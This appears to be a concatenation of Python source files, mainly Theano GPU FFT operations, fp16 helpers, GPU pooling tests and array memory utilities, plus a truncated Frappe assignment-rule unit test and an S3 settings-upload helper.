s3 = session.resource('s3')
except botocore.exceptions.ClientError:
s3 = boto3.resource('s3')
else:
s3 = boto3.resource('s3')
# Create content string
content = ''
for item in params_list:
content += f'{item}\n'
# Write content string directly to file
s3.Object(bucket_name, dirname + '/settings.txt').put(Body=content)
print(f'Successfully uploaded settings file to s3 bucket {bucket_name}')
``` |
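A small usage sketch for the helpers above; the output directory, parameter strings, and bucket name are placeholders.

```python
params = ["dataset=adult", "model=LinearRegression", "numsteps=5000"]
write_params_to_os("results/example_run", params)   # writes results/example_run/settings.txt
# write_params_to_s3(params, "my-bucket", "results/example_run",
#                    ACCESS_KEY=None, SECRET_KEY=None)  # requires AWS credentials
```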
{
"source": "JimmyRetza/Theano",
"score": 2
} |
#### File: theano/gpuarray/fft.py
```python
from __future__ import absolute_import, print_function, division
import numpy as np
import theano
from theano import Op
import theano.tensor as T
from theano.gradient import DisconnectedType
from .basic_ops import (gpu_contiguous, as_gpuarray_variable,
infer_context_name)
from .type import GpuArrayType
import theano.tensor.fft
from .opt import register_opt, op_lifter, register_opt2
try:
import pygpu
pygpu_available = True
except ImportError:
pygpu_available = False
try:
import pycuda.driver
pycuda_available = True
except ImportError:
pycuda_available = False
try:
import skcuda
from skcuda import fft
skcuda_available = True
except (ImportError, Exception):
skcuda_available = False
class CuRFFTOp(Op):
__props__ = ()
def output_type(self, inp):
# add one extra dim for real/imag
return GpuArrayType(inp.dtype,
broadcastable=[False] * (inp.type.ndim + 1),
context_name=inp.type.context_name)
def make_node(self, inp, s=None):
# A shape parameter s can be provided as an input. For now this is used to
# manage odd transform sizes.
        # Later this could be extended to handle padding and truncation,
        # following numpy's interface. However, cuFFT expects arrays that match
# the shape given to the plan, so padding will have to be done in the op.
# The effect of padding on gradients has yet to be investigated.
if not skcuda_available:
raise RuntimeError("skcuda is needed for CuFFTOp")
if not pygpu_available:
raise RuntimeError("pygpu is needed for CuFFTOp")
if not pycuda_available:
raise RuntimeError("pycuda is needed for CuFFTOp")
inp = gpu_contiguous(as_gpuarray_variable(inp,
infer_context_name(inp)))
# If no shape is provided as input, default to input data shape.
if s is None:
s = inp.shape[1:]
s = T.as_tensor_variable(s)
assert inp.dtype == "float32"
assert s.ndim == 1
assert s.dtype in theano.tensor.integer_dtypes
return theano.Apply(self, [inp, s], [self.output_type(inp)()])
def make_thunk(self, node, storage_map, _, _2, impl=None):
inputs = [storage_map[v] for v in node.inputs]
outputs = [storage_map[v] for v in node.outputs]
        # Initialize the CUDA context to the input's.
with node.inputs[0].type.context:
skcuda.misc.init()
plan_input_shape = [None]
plan = [None]
def thunk():
input_shape = inputs[0][0].shape
s = inputs[1][0]
# Since padding is not supported, assert s matches input shape.
assert (input_shape[1:] == s).all()
# construct output shape
output_shape = [input_shape[0]] + list(s)
# DFT of real input is symmetric, no need to store
# redundant coefficients
output_shape[-1] = output_shape[-1] // 2 + 1
# extra dimension with length 2 for real/imag
output_shape += [2]
output_shape = tuple(output_shape)
z = outputs[0]
# only allocate if there is no previous allocation of the
# right size.
if z[0] is None or z[0].shape != output_shape:
z[0] = pygpu.zeros(output_shape, context=inputs[0][0].context,
dtype='float32')
input_pycuda = inputs[0][0]
# I thought we'd need to change the type on output_pycuda
# so it is complex64, but as it turns out skcuda.fft
# doesn't really care either way and treats the array as
# if it is complex64 anyway.
output_pycuda = z[0]
with input_pycuda.context:
# only initialise plan if necessary
if plan[0] is None or plan_input_shape[0] != input_shape:
plan_input_shape[0] = input_shape
plan[0] = fft.Plan(s, np.float32, np.complex64,
batch=input_shape[0])
# Sync GPU variables before computation
input_pycuda.sync()
output_pycuda.sync()
fft.fft(input_pycuda, output_pycuda, plan[0])
# Sync results to ensure output contains completed computation
pycuda.driver.Context.synchronize()
thunk.inputs = inputs
thunk.outputs = outputs
thunk.lazy = False
return thunk
def grad(self, inputs, output_grads):
gout, = output_grads
s = inputs[1]
# Divide the last dimension of the output gradients by 2, they are
# double-counted by the real-IFFT due to symmetry, except the first
# and last elements (for even transforms) which are unique.
idx = [slice(None)] * (gout.ndim - 2) \
+ [slice(1, (s[-1] // 2) + (s[-1] % 2))] + [slice(None)]
gout = T.set_subtensor(gout[idx], gout[idx] * 0.5)
return [cuirfft_op(gout, s), DisconnectedType()()]
def connection_pattern(self, node):
        # Specify that the shape input parameter has no connection to the graph and gradients.
return [[True], [False]]
curfft_op = CuRFFTOp()
class CuIRFFTOp(Op):
__props__ = ()
def output_type(self, inp):
# remove extra dim for real/imag
return GpuArrayType(inp.dtype,
broadcastable=[False] * (inp.type.ndim - 1),
context_name=inp.type.context_name)
def make_node(self, inp, s=None):
# A shape parameter is expected as an input. For now this is used to
# manage odd transform sizes.
        # Later this could be extended to handle padding and truncation,
        # following numpy's interface. However, cuFFT expects arrays that match
# the shape given to the plan, so padding will have to be done in the op.
# The effect of padding on gradients has yet to be investigated.
if not skcuda_available:
raise RuntimeError("skcuda is needed for CuIFFTOp")
if not pygpu_available:
raise RuntimeError("pygpu is needed for CuIFFTOp")
if not pycuda_available:
raise RuntimeError("pycuda is needed for CuIFFTOp")
inp = gpu_contiguous(as_gpuarray_variable(inp,
infer_context_name(inp)))
# If no shape is provided as input, calculate shape assuming even real transform.
if s is None:
s = inp.shape[1:-1]
s = T.set_subtensor(s[-1], (s[-1] - 1) * 2)
s = T.as_tensor_variable(s)
assert inp.dtype == "float32"
assert s.ndim == 1
return theano.Apply(self, [inp, s], [self.output_type(inp)()])
def make_thunk(self, node, storage_map, _, _2, impl=None):
inputs = [storage_map[v] for v in node.inputs]
outputs = [storage_map[v] for v in node.outputs]
        # Initialize the CUDA context to the input's.
with node.inputs[0].type.context:
skcuda.misc.init()
plan_input_shape = [None]
plan = [None]
def thunk():
input_shape = inputs[0][0].shape
s = inputs[1][0]
# Since padding is not supported, assert that last dimension corresponds to
# input forward transform size.
assert (input_shape[1:-2] == s[:-1]).all()
assert ((input_shape[-2] - 1) * 2 + s[-1] % 2 == s[-1]).all()
# construct output shape
# chop off the extra length-2 dimension for real/imag
output_shape = [input_shape[0]] + list(s)
output_shape = tuple(output_shape)
z = outputs[0]
# only allocate if there is no previous allocation of the
# right size.
if z[0] is None or z[0].shape != output_shape:
z[0] = pygpu.zeros(output_shape, context=inputs[0][0].context,
dtype='float32')
input_pycuda = inputs[0][0]
# input_pycuda is a float32 array with an extra dimension,
# but will be interpreted by skcuda as a complex64
# array instead.
output_pycuda = z[0]
with input_pycuda.context:
# only initialise plan if necessary
if plan[0] is None or plan_input_shape[0] != input_shape:
plan_input_shape[0] = input_shape
plan[0] = fft.Plan(s, np.complex64, np.float32,
batch=output_shape[0])
# Sync GPU variables before computation
input_pycuda.sync()
output_pycuda.sync()
fft.ifft(input_pycuda, output_pycuda, plan[0])
# strangely enough, enabling rescaling here makes it run
# very, very slowly, so do this rescaling manually
# afterwards!
# Sync results to ensure output contains completed computation
pycuda.driver.Context.synchronize()
thunk.inputs = inputs
thunk.outputs = outputs
thunk.lazy = False
return thunk
def grad(self, inputs, output_grads):
gout, = output_grads
s = inputs[1]
gf = curfft_op(gout, s)
# Multiply the last dimension of the gradient by 2, they represent
# both positive and negative frequencies, except the first
# and last elements (for even transforms) which are unique.
idx = [slice(None)] * (gf.ndim - 2) \
+ [slice(1, (s[-1] // 2) + (s[-1] % 2))] + [slice(None)]
gf = T.set_subtensor(gf[idx], gf[idx] * 2)
return [gf, DisconnectedType()()]
def connection_pattern(self, node):
# Specify that the shape input parameter has no connection to the graph and gradients.
return [[True], [False]]
cuirfft_op = CuIRFFTOp()
def curfft(inp, norm=None):
"""
Performs the fast Fourier transform of a real-valued input on the GPU.
The input must be a real-valued float32 variable of dimensions (m, ..., n).
It performs FFTs of size (..., n) on m batches.
The output is a GpuArray of dimensions (m, ..., n//2+1, 2). The second to
last dimension of the output contains the n//2+1 non-trivial elements of
the real-valued FFTs. The real and imaginary parts are stored as a pair of
float32 arrays.
Parameters
----------
inp
Array of real-valued float32 of size (m, ..., n), containing m inputs of
size (..., n).
norm : {None, 'ortho', 'no_norm'}
Normalization of transform. Following numpy, default *None* normalizes
only the inverse transform by n, 'ortho' yields the unitary transform
(:math:`1/\sqrt n` forward and inverse). In addition, 'no_norm' leaves
the transform unnormalized.
"""
s = inp.shape[1:]
cond_norm = _unitary(norm)
scaling = 1
if cond_norm == "ortho":
scaling = T.sqrt(s.prod().astype('float32'))
return curfft_op(inp, s) / scaling
def cuirfft(inp, norm=None, is_odd=False):
"""
Performs the inverse fast Fourier Transform with real-valued output on the GPU.
The input is a variable of dimensions (m, ..., n//2+1, 2) with
type float32 representing the non-trivial elements of m
real-valued Fourier transforms of initial size (..., n). The real and
imaginary parts are stored as a pair of float32 arrays.
The output is a real-valued float32 variable of dimensions (m, ..., n)
giving the m inverse FFTs.
Parameters
----------
inp
Array of float32 of size (m, ..., n//2+1, 2), containing m inputs
with n//2+1 non-trivial elements on the last dimension and real
and imaginary parts stored as separate arrays.
norm : {None, 'ortho', 'no_norm'}
Normalization of transform. Following numpy, default *None* normalizes
only the inverse transform by n, 'ortho' yields the unitary transform
(:math:`1/\sqrt n` forward and inverse). In addition, 'no_norm' leaves
the transform unnormalized.
is_odd : {True, False}
Set to True to get a real inverse transform output with an odd last dimension
of length (N-1)*2 + 1 for an input last dimension of length N.
"""
if is_odd not in (True, False):
raise ValueError("Invalid value %s for is_odd, must be True or False" % is_odd)
s = inp.shape[1:-1]
if is_odd:
s = T.set_subtensor(s[-1], (s[-1] - 1) * 2 + 1)
else:
s = T.set_subtensor(s[-1], (s[-1] - 1) * 2)
cond_norm = _unitary(norm)
scaling = 1
if cond_norm is None:
scaling = s.prod().astype('float32')
elif cond_norm == "ortho":
scaling = T.sqrt(s.prod().astype('float32'))
return cuirfft_op(inp, s) / scaling
def _unitary(norm):
if norm not in (None, "ortho", "no_norm"):
raise ValueError("Invalid value %s for norm, must be None, 'ortho' or "
"'no_norm'" % norm)
return norm
if skcuda_available:
@register_opt('fast_compile')
@op_lifter([theano.tensor.fft.RFFTOp])
@register_opt2([theano.tensor.fft.RFFTOp], 'fast_compile')
def local_gpua_curfft_op(op, ctx_name, inputs, outputs):
return curfft_op
@register_opt('fast_compile')
@op_lifter([theano.tensor.fft.IRFFTOp])
@register_opt2([theano.tensor.fft.IRFFTOp], 'fast_compile')
def local_gpua_cuirfft_op(op, ctx_name, inputs, outputs):
return cuirfft_op
```
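The `curfft`/`cuirfft` pair defined above gives a round-trip real FFT on the GPU. A minimal usage sketch, assuming a working Theano GPU setup (libgpuarray, pycuda and scikit-cuda installed) and that this module is importable as `theano.gpuarray.fft`:

```python
# Sketch only: needs a configured GPU backend; not runnable on CPU-only installs.
import numpy as np
import theano
import theano.tensor as T
from theano.gpuarray.fft import curfft, cuirfft

x = T.matrix('x', dtype='float32')      # (m, n) real-valued batch
spec = curfft(x, norm='ortho')          # (m, n//2 + 1, 2) real/imag pairs
recon = cuirfft(spec, norm='ortho')     # back to (m, n)
f = theano.function([x], [spec, recon])

data = np.random.rand(4, 16).astype('float32')
spec_val, recon_val = f(data)
print(np.allclose(recon_val, data, atol=1e-4))  # should print True
```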
#### File: theano/gpuarray/fp16_help.py
```python
from __future__ import absolute_import, print_function, division
def work_dtype(dtype):
"""
Return the data type for working memory.
"""
if dtype == 'float16':
return 'float32'
else:
return dtype
def load_w(dtype):
"""
Return the function name to load data.
This should be used like this::
code = '%s(ival)' % (load_w(input_type),)
"""
if dtype == 'float16':
return 'ga_half2float'
else:
return ''
def write_w(dtype):
"""
Return the function name to write data.
This should be used like this::
code = 'res = %s(oval)' % (write_w(output_type),)
"""
if dtype == 'float16':
return 'ga_float2half'
else:
return ''
```
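These helpers only build strings that get spliced into generated kernel source, so they can be exercised without a GPU. An illustrative loop following the substitution pattern shown in the docstrings (the import path is assumed from the file location):

```python
from theano.gpuarray.fp16_help import work_dtype, load_w, write_w

for dtype in ('float16', 'float32'):
    print(dtype,
          work_dtype(dtype),                      # dtype used for intermediate work
          "%s(ival)" % (load_w(dtype),),          # e.g. ga_half2float(ival) or (ival)
          "res = %s(oval)" % (write_w(dtype),))   # e.g. res = ga_float2half(oval)
```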
#### File: gpuarray/tests/test_pool.py
```python
from __future__ import absolute_import, print_function, division
import unittest
import copy
import itertools
import numpy as np
import theano
from theano import gradient
from theano import tensor
from theano.tensor.signal.pool import (Pool, MaxPoolGrad, AveragePoolGrad,
DownsampleFactorMaxGradGrad)
from theano.tests import unittest_tools as utt
from .config import mode_with_gpu, mode_without_gpu
from .test_basic_ops import rand
from ..pool import (GpuPool, GpuMaxPoolGrad, GpuAveragePoolGrad,
GpuDownsampleFactorMaxGradGrad)
class TestPool(unittest.TestCase):
def test_pool_py_interface(self):
shp = (2, 2, 2, 2)
inp = theano.shared(rand(*shp), 'a')
inp = tensor.as_tensor_variable(inp)
with self.assertRaises(ValueError):
# test when pad >= ws
ds_op = GpuPool(ignore_border=True, ndim=2)
ds_op(inp, [2, 2], pad=[3, 3])
with self.assertRaises(ValueError):
# test when ignore_border and pad >= 0
ds_op = GpuPool(ignore_border=False, ndim=2)
ds_op(inp, [2, 2], pad=[1, 1])
def test_pool_c_interface(self):
gpu_mode = mode_with_gpu.excluding("cudnn")
gpu_mode.check_py_code = False
shp = (2, 2, 2, 2)
inp = theano.shared(rand(*shp), 'a')
inp = tensor.as_tensor_variable(inp)
with self.assertRaises(ValueError):
# test when ignore_border and pad >= 0
ds_op = GpuPool(ignore_border=False, ndim=2)
pad = tensor.as_tensor_variable([1, 1])
f = theano.function([], ds_op(inp, [2, 2], pad=pad), mode=gpu_mode)
f()
def test_pool_big_ws(self):
gpu_mode = mode_with_gpu.excluding("cudnn")
gpu_mode.check_py_code = False
shp = (2, 2, 2, 2)
inp = theano.shared(rand(*shp), 'a')
inp = tensor.as_tensor_variable(inp)
ds_op = GpuPool(ignore_border=False, mode='average_exc_pad', ndim=2)
pad = tensor.as_tensor_variable([0, 0])
f = theano.function([], ds_op(inp, [5, 5], stride=[1, 1], pad=pad),
mode=gpu_mode)
f()
def test_pool2d():
shps = [(1, 12),
(1, 1, 12),
(1, 1, 1, 12),
(1, 1, 2, 2),
(1, 1, 1, 1),
(1, 1, 4, 4),
(1, 1, 10, 11),
(1, 2, 2, 2),
(3, 5, 4, 4),
(25, 1, 7, 7),
(1, 1, 12, 12),
(1, 1, 2, 14),
(1, 1, 12, 14),
(1, 1, 14, 14),
(1, 1, 16, 16),
(1, 1, 18, 18),
(1, 1, 24, 24),
(1, 6, 24, 24),
(10, 1, 24, 24),
(10, 6, 24, 24),
(30, 6, 12, 12),
(30, 2, 24, 24),
(30, 6, 24, 24),
(10, 10, 10, 11),
(1, 1, 10, 1025),
(1, 1, 10, 1023),
(1, 1, 1025, 10),
(1, 1, 1023, 10),
(3, 2, 16, 16, 16),
(3, 2, 6, 6, 6, 5),
(3, 2, 6, 6, 6, 5, 7), ]
np.random.RandomState(utt.fetch_seed()).shuffle(shps)
test_ws = (2, 2), (3, 2), (1, 1)
test_st = (2, 2), (3, 2), (1, 1)
test_mode = ['max', 'sum', 'average_inc_pad', 'average_exc_pad']
ref_mode = copy.copy(mode_without_gpu)
ref_mode.check_py_code = False
gpu_mode = mode_with_gpu.excluding("cudnn")
gpu_mode.check_py_code = False
for shp in shps:
for mode, ws, st in itertools.product(test_mode, test_ws, test_st):
if ws[0] > shp[-2] or ws[1] > shp[-1]:
continue
for ignore_border, pad in zip((True, False), [(1, 1), (0, 0)]):
if pad[0] >= ws[0] or pad[1] >= ws[1]:
continue
if mode == 'average_exc_pad' and (pad[0] > 0 or pad[1] > 0):
continue
# print('test_pool2d', shp, ws, st, pad, mode, ignore_border)
ds_op = Pool(ndim=len(ws), mode=mode, ignore_border=ignore_border)
a = theano.shared(rand(*shp), 'a')
a_pooled = ds_op(tensor.as_tensor_variable(a), ws, st, pad)
f = theano.function([], a_pooled, mode=gpu_mode)
f2 = theano.function([], a_pooled, mode=ref_mode)
assert any([isinstance(node.op, GpuPool)
for node in f.maker.fgraph.toposort()])
assert any([isinstance(node.op, Pool)
for node in f2.maker.fgraph.toposort()])
assert np.allclose(f(), f2()), (shp, ws, st, pad, mode, ignore_border)
a_pooled_grad = tensor.grad(a_pooled.sum(), a)
g = theano.function([], a_pooled_grad, mode=gpu_mode)
g2 = theano.function([], a_pooled_grad, mode=ref_mode)
if mode == 'max':
gop = GpuMaxPoolGrad
gop2 = MaxPoolGrad
else:
gop = GpuAveragePoolGrad
gop2 = AveragePoolGrad
assert any([isinstance(node.op, gop)
for node in g.maker.fgraph.toposort()])
assert any([isinstance(node.op, gop2)
for node in g2.maker.fgraph.toposort()])
assert np.allclose(g(), g2()), (shp, ws, st, pad, mode, ignore_border)
# test rop and grad grad for max pooling
# for average pooling grad grad is just average pooling grad
if mode != 'max':
continue
ea = theano.shared(rand(*shp), 'ea')
gr = theano.function([], tensor.Rop(a_pooled, a, ea), mode=gpu_mode)
gr2 = theano.function([], tensor.Rop(a_pooled, a, ea), mode=ref_mode)
assert any([
isinstance(node.op, GpuDownsampleFactorMaxGradGrad)
for node in gr.maker.fgraph.toposort()
])
assert any([
isinstance(node.op, DownsampleFactorMaxGradGrad)
for node in gr2.maker.fgraph.toposort()
])
assert np.allclose(gr(), gr2()), (shp, ws, st, pad, mode, ignore_border)
ggf = gradient.Lop(tensor.grad((a_pooled**2).sum(), a), a, a)
gg = theano.function([], ggf, mode=gpu_mode)
gg2 = theano.function([], ggf, mode=ref_mode)
assert any([
isinstance(node.op, GpuDownsampleFactorMaxGradGrad)
for node in gg.maker.fgraph.toposort()
])
assert any([
isinstance(node.op, DownsampleFactorMaxGradGrad)
for node in gg2.maker.fgraph.toposort()
])
assert np.allclose(gg(), gg2()), (shp, ws, st, pad, mode, ignore_border)
def test_pool3d():
shps = [(1, 1, 12),
(1, 1, 1, 1, 1),
(1, 1, 1, 1, 1025),
(1, 1, 2, 2, 2),
(1, 1, 7, 7, 7),
(1, 1, 9, 10, 11),
(1, 6, 18, 18, 18),
(1, 1, 6, 24, 24),
(1, 10, 1, 24, 24),
(1, 10, 6, 24, 24),
(1, 30, 6, 12, 12),
(1, 30, 2, 24, 24),
(1, 30, 6, 24, 24),
(1, 10, 10, 10, 11),
(1, 1, 10, 10, 1025),
(1, 1, 10, 10, 1023),
(1, 1, 10, 1025, 10),
(1, 1, 10, 1023, 10),
(3, 2, 6, 6, 6, 5),
(3, 2, 6, 6, 6, 5, 7), ]
np.random.RandomState(utt.fetch_seed()).shuffle(shps)
test_ws = (2, 2, 2), (3, 2, 3), (1, 1, 1)
test_st = (2, 2, 2), (2, 3, 2), (1, 1, 1)
test_mode = ['max', 'sum', 'average_inc_pad', 'average_exc_pad']
ref_mode = copy.copy(mode_without_gpu)
ref_mode.check_py_code = False
gpu_mode = mode_with_gpu.excluding("cudnn")
gpu_mode.check_py_code = False
for shp in shps:
for mode, ws, st in itertools.product(test_mode, test_ws, test_st):
if ws[0] > shp[-3] or ws[1] > shp[-2] or ws[2] > shp[-1]:
continue
for ignore_border, pad in zip((True, False), [(1, 1, 1), (0, 0, 0)]):
if pad[0] >= ws[0] or pad[1] >= ws[1] or pad[2] >= ws[2]:
continue
if mode == 'average_exc_pad' and (pad[0] > 0 or pad[1] > 0 or pad[2] > 0):
continue
# print('test_pool3d', shp, ws, st, pad, mode, ignore_border)
ds_op = Pool(ndim=len(ws), mode=mode, ignore_border=ignore_border)
a = theano.shared(rand(*shp), 'a')
a_pooled = ds_op(tensor.as_tensor_variable(a), ws, st, pad)
f = theano.function([], a_pooled, mode=gpu_mode)
f2 = theano.function([], a_pooled, mode=ref_mode)
assert any([isinstance(node.op, GpuPool)
for node in f.maker.fgraph.toposort()])
assert any([isinstance(node.op, Pool)
for node in f2.maker.fgraph.toposort()])
assert np.allclose(f(), f2()), (shp, ws, st, pad, mode, ignore_border)
a_pooled_grad = tensor.grad(a_pooled.sum(), a)
g = theano.function([], a_pooled_grad, mode=gpu_mode)
g2 = theano.function([], a_pooled_grad, mode=ref_mode)
if mode == 'max':
gop = GpuMaxPoolGrad
gop2 = MaxPoolGrad
else:
gop = GpuAveragePoolGrad
gop2 = AveragePoolGrad
assert any([isinstance(node.op, gop)
for node in g.maker.fgraph.toposort()])
assert any([isinstance(node.op, gop2)
for node in g2.maker.fgraph.toposort()])
assert np.allclose(g(), g2()), (shp, ws, st, pad, mode, ignore_border)
# test rop and grad grad for max pooling
# for average pooling grad grad is just average pooling grad
if mode != 'max':
continue
ea = theano.shared(rand(*shp), 'ea')
gr = theano.function([], tensor.Rop(a_pooled, a, ea), mode=gpu_mode)
gr2 = theano.function([], tensor.Rop(a_pooled, a, ea), mode=ref_mode)
assert any([
isinstance(node.op, GpuDownsampleFactorMaxGradGrad)
for node in gr.maker.fgraph.toposort()
])
assert any([
isinstance(node.op, DownsampleFactorMaxGradGrad)
for node in gr2.maker.fgraph.toposort()
])
assert np.allclose(gr(), gr2()), (shp, ws, st, pad, mode, ignore_border)
ggf = gradient.Lop(tensor.grad((a_pooled**2).sum(), a), a, a)
gg = theano.function([], ggf, mode=gpu_mode)
gg2 = theano.function([], ggf, mode=ref_mode)
assert any([
isinstance(node.op, GpuDownsampleFactorMaxGradGrad)
for node in gg.maker.fgraph.toposort()
])
assert any([
isinstance(node.op, DownsampleFactorMaxGradGrad)
for node in gg2.maker.fgraph.toposort()
])
assert np.allclose(gg(), gg2()), (shp, ws, st, pad, mode, ignore_border)
```
#### File: theano/misc/may_share_memory.py
```python
from __future__ import absolute_import, print_function, division
import numpy as np
from theano.tensor.basic import TensorType
try:
import scipy.sparse
from theano.sparse.basic import SparseType
def _is_sparse(a):
return scipy.sparse.issparse(a)
except ImportError:
# scipy not imported, there can only be ndarray and gpuarray
def _is_sparse(a):
return False
from theano import gpuarray
if gpuarray.pygpu:
def _is_gpua(a):
return isinstance(a, gpuarray.pygpu.gpuarray.GpuArray)
else:
def _is_gpua(a):
return False
__docformat__ = "restructuredtext en"
def may_share_memory(a, b, raise_other_type=True):
a_ndarray = isinstance(a, np.ndarray)
b_ndarray = isinstance(b, np.ndarray)
if a_ndarray and b_ndarray:
return TensorType.may_share_memory(a, b)
a_gpua = _is_gpua(a)
b_gpua = _is_gpua(b)
if a_gpua and b_gpua:
return gpuarray.pygpu.gpuarray.may_share_memory(a, b)
a_sparse = _is_sparse(a)
b_sparse = _is_sparse(b)
if (not(a_ndarray or a_sparse or a_gpua) or
not(b_ndarray or b_sparse or b_gpua)):
if raise_other_type:
raise TypeError("may_share_memory support only ndarray"
" and scipy.sparse or GpuArray type")
return False
if a_gpua or b_gpua:
return False
return SparseType.may_share_memory(a, b)
```
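`may_share_memory` only dispatches on the argument types, so the ndarray path can be checked without a GPU or scipy. A small illustrative check (import path assumed from the file location):

```python
import numpy as np
from theano.misc.may_share_memory import may_share_memory

a = np.arange(10)
b = a[2:5]    # a view shares its buffer with a
c = a.copy()  # a copy does not
print(may_share_memory(a, b))   # True
print(may_share_memory(a, c))   # False
print(may_share_memory(a, "x", raise_other_type=False))  # False instead of raising
```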
#### File: theano/tensor/inc_code.py
```python
from __future__ import absolute_import, print_function, division
def inc_code():
types = ['npy_' + t for t in ['int8', 'int16', 'int32', 'int64',
'uint8', 'uint16', 'uint32', 'uint64',
'float16', 'float32', 'float64']]
complex_types = ['npy_' + t for t in ['complex32', 'complex64',
'complex128']]
inplace_map_template = """
#if defined(%(typen)s)
static void %(type)s_inplace_add(PyArrayMapIterObject *mit,
PyArrayIterObject *it, int inc_or_set)
{
int index = mit->size;
while (index--) {
%(op)s
PyArray_MapIterNext(mit);
PyArray_ITER_NEXT(it);
}
}
#endif
"""
floatadd = ("((%(type)s*)mit->dataptr)[0] = "
"(inc_or_set ? ((%(type)s*)mit->dataptr)[0] : 0)"
" + ((%(type)s*)it->dataptr)[0];")
complexadd = """
((%(type)s*)mit->dataptr)[0].real =
(inc_or_set ? ((%(type)s*)mit->dataptr)[0].real : 0)
+ ((%(type)s*)it->dataptr)[0].real;
((%(type)s*)mit->dataptr)[0].imag =
(inc_or_set ? ((%(type)s*)mit->dataptr)[0].imag : 0)
+ ((%(type)s*)it->dataptr)[0].imag;
"""
fns = ''.join([inplace_map_template % {'type': t, 'typen': t.upper(),
'op': floatadd % {'type': t}}
for t in types] +
[inplace_map_template % {'type': t, 'typen': t.upper(),
'op': complexadd % {'type': t}}
for t in complex_types])
def gen_binop(type, typen):
return """
#if defined(%(typen)s)
%(type)s_inplace_add,
#endif
""" % dict(type=type, typen=typen)
fn_array = ("static inplace_map_binop addition_funcs[] = {" +
''.join([gen_binop(type=t, typen=t.upper())
for t in types + complex_types]) + "NULL};\n")
def gen_num(typen):
return """
#if defined(%(typen)s)
%(typen)s,
#endif
""" % dict(type=type, typen=typen)
type_number_array = ("static int type_numbers[] = {" +
''.join([gen_num(typen=t.upper())
for t in types + complex_types]) + "-1000};")
code = ("""
typedef void (*inplace_map_binop)(PyArrayMapIterObject *,
PyArrayIterObject *, int inc_or_set);
""" + fns + fn_array + type_number_array + """
static int
map_increment(PyArrayMapIterObject *mit, PyArrayObject *op,
inplace_map_binop add_inplace, int inc_or_set)
{
PyArrayObject *arr = NULL;
PyArrayIterObject *it;
PyArray_Descr *descr;
if (mit->ait == NULL) {
return -1;
}
descr = PyArray_DESCR(mit->ait->ao);
Py_INCREF(descr);
arr = (PyArrayObject *)PyArray_FromAny((PyObject *)op, descr,
0, 0, NPY_ARRAY_FORCECAST, NULL);
if (arr == NULL) {
return -1;
}
if ((mit->subspace != NULL) && (mit->consec)) {
PyArray_MapIterSwapAxes(mit, (PyArrayObject **)&arr, 0);
if (arr == NULL) {
return -1;
}
}
it = (PyArrayIterObject*)
PyArray_BroadcastToShape((PyObject*)arr, mit->dimensions, mit->nd);
if (it == NULL) {
Py_DECREF(arr);
return -1;
}
(*add_inplace)(mit, it, inc_or_set);
Py_DECREF(arr);
Py_DECREF(it);
return 0;
}
static int
inplace_increment(PyArrayObject *a, PyObject *index, PyArrayObject *inc,
int inc_or_set)
{
inplace_map_binop add_inplace = NULL;
int type_number = -1;
int i = 0;
PyArrayMapIterObject * mit;
if (PyArray_FailUnlessWriteable(a, "input/output array") < 0) {
return -1;
}
if (PyArray_NDIM(a) == 0) {
PyErr_SetString(PyExc_IndexError, "0-d arrays can't be indexed.");
return -1;
}
type_number = PyArray_TYPE(a);
while (type_numbers[i] >= 0 && addition_funcs[i] != NULL){
if (type_number == type_numbers[i]) {
add_inplace = addition_funcs[i];
break;
}
i++ ;
}
if (add_inplace == NULL) {
PyErr_SetString(PyExc_TypeError, "unsupported type for a");
return -1;
}
mit = (PyArrayMapIterObject *) PyArray_MapIterArray(a, index);
if (mit == NULL) {
goto fail;
}
if (map_increment(mit, inc, add_inplace, inc_or_set) != 0) {
goto fail;
}
Py_DECREF(mit);
Py_INCREF(Py_None);
return 0;
fail:
Py_XDECREF(mit);
return -1;
}
""")
return code
``` |
{
"source": "jimmyrianto/frappe",
"score": 2
} |
#### File: doctype/assignment_rule/test_assignment_rule.py
```python
from __future__ import unicode_literals
import frappe
import unittest
from frappe.utils import random_string
from frappe.test_runner import make_test_records
class TestAutoAssign(unittest.TestCase):
def setUp(self):
make_test_records("User")
days = [
dict(day = 'Sunday'),
dict(day = 'Monday'),
dict(day = 'Tuesday'),
dict(day = 'Wednesday'),
dict(day = 'Thursday'),
dict(day = 'Friday'),
dict(day = 'Saturday'),
]
self.assignment_rule = get_assignment_rule([days, days])
clear_assignments()
def test_round_robin(self):
note = make_note(dict(public=1))
# check if auto assigned to first user
self.assertEqual(frappe.db.get_value('ToDo', dict(
reference_type = 'Note',
reference_name = note.name,
status = 'Open'
), 'owner'), '<EMAIL>')
note = make_note(dict(public=1))
# check if auto assigned to second user
self.assertEqual(frappe.db.get_value('ToDo', dict(
reference_type = 'Note',
reference_name = note.name,
status = 'Open'
), 'owner'), '<EMAIL>')
clear_assignments()
note = make_note(dict(public=1))
# check if auto assigned to third user, even if
# previous assignments were closed
self.assertEqual(frappe.db.get_value('ToDo', dict(
reference_type = 'Note',
reference_name = note.name,
status = 'Open'
), 'owner'), '<EMAIL>')
# check loop back to first user
note = make_note(dict(public=1))
self.assertEqual(frappe.db.get_value('ToDo', dict(
reference_type = 'Note',
reference_name = note.name,
status = 'Open'
), 'owner'), '<EMAIL>')
def test_load_balancing(self):
self.assignment_rule.rule = 'Load Balancing'
self.assignment_rule.save()
for _ in range(30):
note = make_note(dict(public=1))
# check if each user has 10 assignments (?)
for user in ('<EMAIL>', '<EMAIL>', '<EMAIL>'):
self.assertEqual(len(frappe.get_all('ToDo', dict(owner = user, reference_type = 'Note'))), 10)
# clear 5 assignments for first user
# can't do a limit in "delete" since postgres does not support it
for d in frappe.get_all('ToDo', dict(reference_type = 'Note', owner = '<EMAIL>'), limit=5):
frappe.db.sql("delete from tabToDo where name = %s", d.name)
# add 5 more assignments
for i in range(5):
make_note(dict(public=1))
# check if each user still has 10 assignments
for user in ('<EMAIL>', '<EMAIL>', '<EMAIL>'):
self.assertEqual(len(frappe.get_all('ToDo', dict(owner = user, reference_type = 'Note'))), 10)
def test_assign_condition(self):
# check condition
note = make_note(dict(public=0))
self.assertEqual(frappe.db.get_value('ToDo', dict(
reference_type = 'Note',
reference_name = note.name,
status = 'Open'
), 'owner'), None)
def test_clear_assignment(self):
note = make_note(dict(public=1))
# check if auto assigned to first user
todo = frappe.get_list('ToDo', dict(
reference_type = 'Note',
reference_name = note.name,
status = 'Open'
))[0]
todo = frappe.get_doc('ToDo', todo['name'])
self.assertEqual(todo.owner, '<EMAIL>')
# test auto unassign
note.public = 0
note.save()
todo.load_from_db()
# check if todo is cancelled
self.assertEqual(todo.status, 'Cancelled')
def test_close_assignment(self):
note = make_note(dict(public=1, content="valid"))
